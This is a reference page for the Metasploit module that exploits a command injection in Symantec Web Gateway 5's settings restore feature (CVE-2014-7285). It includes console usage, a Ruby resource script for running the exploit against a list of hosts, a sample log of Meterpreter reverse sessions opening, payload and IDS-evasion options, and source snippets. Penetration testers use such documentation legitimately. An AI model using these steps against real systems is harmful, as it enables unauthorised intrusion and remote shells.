Symantec Web Gateway 5 restore.php Post Authentication Command Injection - Metasploit


This page contains detailed information about how to use the exploit/linux/http/symantec_web_gateway_restore metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Symantec Web Gateway 5 restore.php Post Authentication Command Injection
Module: exploit/linux/http/symantec_web_gateway_restore
Source code: modules/exploits/linux/http/symantec_web_gateway_restore.rb
Disclosure date: 2014-12-16
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2014-7285

This module exploits a command injection vulnerability found in Symantec Web Gateway's setting restoration feature. The filename portion can be used to inject system commands into a syscall function, and gain control under the context of HTTP service. For Symantec Web Gateway 5.1.1, you can exploit this vulnerability by any kind of user. However, for version 5.2.1, you must be an administrator.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using symantec_web_gateway_restore against a single host

Normally, you can use exploit/linux/http/symantec_web_gateway_restore this way:

msf > use exploit/linux/http/symantec_web_gateway_restore
msf exploit(symantec_web_gateway_restore) > show targets
    ... a list of targets ...
msf exploit(symantec_web_gateway_restore) > set TARGET target-id
msf exploit(symantec_web_gateway_restore) > show options
    ... show and set options ...
msf exploit(symantec_web_gateway_restore) > exploit

Using symantec_web_gateway_restore against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your symantec_web_gateway_restore will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/http/symantec_web_gateway_restore")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • USERNAME: The username to login as

  • PASSWORD: The password for the username

Go back to menu.

Msfconsole Usage


Here is how the linux/http/symantec_web_gateway_restore exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/symantec_web_gateway_restore

msf6 exploit(linux/http/symantec_web_gateway_restore) > show info

       Name: Symantec Web Gateway 5 restore.php Post Authentication Command Injection
     Module: exploit/linux/http/symantec_web_gateway_restore
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2014-12-16

Provided by:
  Egidio Romano
  sinn3r <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Symantec Web Gateway 5

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    yes       The password for the username
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      443              yes       The target port (TCP)
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The URI to Symantec Web Gateway
  USERNAME                    yes       The username to login as
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a command injection vulnerability found in 
  Symantec Web Gateway's setting restoration feature. The filename 
  portion can be used to inject system commands into a syscall 
  function, and gain control under the context of HTTP service. For 
  Symantec Web Gateway 5.1.1, you can exploit this vulnerability by 
  any kind of user. However, for version 5.2.1, you must be an 
  administrator.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2014-7285
  OSVDB (116009)
  http://www.securityfocus.com/bid/71620
  http://karmainsecurity.com/KIS-2014-19
  http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20141216_00

Module Options


This is a complete list of options available in the linux/http/symantec_web_gateway_restore exploit:

msf6 exploit(linux/http/symantec_web_gateway_restore) > show options

Module options (exploit/linux/http/symantec_web_gateway_restore):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The password for the username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI to Symantec Web Gateway
   USERNAME                    yes       The username to login as
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Symantec Web Gateway 5

Advanced Options


Here is a complete list of advanced options supported by the linux/http/symantec_web_gateway_restore exploit:

msf6 exploit(linux/http/symantec_web_gateway_restore) > show advanced

Module advanced options (exploit/linux/http/symantec_web_gateway_restore):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/symantec_web_gateway_restore module can exploit:

msf6 exploit(linux/http/symantec_web_gateway_restore) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Symantec Web Gateway 5

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/symantec_web_gateway_restore exploit:

msf6 exploit(linux/http/symantec_web_gateway_restore) > show payloads

Compatible Payloads
===================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  payload/cmd/unix/generic                              normal  No     Unix Command, Generic Command Execution
   1  payload/cmd/unix/reverse_python                       normal  No     Unix Command Shell, Reverse TCP (via Python)
   2  payload/cmd/unix/reverse_python_ssl                   normal  No     Unix Command Shell, Reverse TCP SSL (via python)

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/symantec_web_gateway_restore exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/symantec_web_gateway_restore) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Connection timed out while retrieving PHPSESSID


Here is a relevant code snippet related to the "Connection timed out while retrieving PHPSESSID" error message:

87:	      'uri'    => normalize_uri(uri, 'spywall/login.php'),
88:	      'method' => 'GET',
89:	    })
90:	
91:	    unless res
92:	      fail_with(Failure::Unknown, 'Connection timed out while retrieving PHPSESSID')
93:	    end
94:	
95:	    cookies = res.get_cookies
96:	    sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || ''
97:	

Connection timed out while attempting to login


Here is a relevant code snippet related to the "Connection timed out while attempting to login" error message:

113:	        'loginBtn' => 'Login'
114:	      }
115:	    })
116:	
117:	    unless res
118:	      fail_with(Failure::Unknown, 'Connection timed out while attempting to login')
119:	    end
120:	
121:	    cookies = res.get_cookies
122:	    sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || ''
123:	

Bad username or password: <USERNAME>:<PASSWORD>


Here is a relevant code snippet related to the "Bad username or password: <USERNAME>:<PASSWORD>" error message:

124:	    if res.headers['Location'] =~ /executive_summary\.php$/ && !sid.blank?
125:	      # Successful login
126:	      return sid
127:	    else
128:	      # Failed login
129:	      fail_with(Failure::NoAccess, "Bad username or password: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
130:	    end
131:	  end
132:	
133:	  def build_payload
134:	    # At of today (Feb 27 2015), there are only three payloads this module will support:

Failed to get the session ID. Cannot continue with the login.


Here is a relevant code snippet related to the "Failed to get the session ID. Cannot continue with the login." error message:

189:	
190:	  def exploit
191:	    print_status("Getting the PHPSESSID...")
192:	    sid = get_sid
193:	    if sid.blank?
194:	      print_error("Failed to get the session ID. Cannot continue with the login.")
195:	      return
196:	    end
197:	
198:	    print_status("Attempting to log in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
199:	    sid = login(sid)

Failed to get the session ID from the login process. Cannot continue with the injection.


Here is a relevant code snippet related to the "Failed to get the session ID from the login process. Cannot continue with the injection." error message:

196:	    end
197:	
198:	    print_status("Attempting to log in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
199:	    sid = login(sid)
200:	    if sid.blank?
201:	      print_error("Failed to get the session ID from the login process. Cannot continue with the injection.")
202:	      return
203:	    else
204:	      # Good password, keep it
205:	      store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
206:	    end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Egidio Romano
  • sinn3r

Version


This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.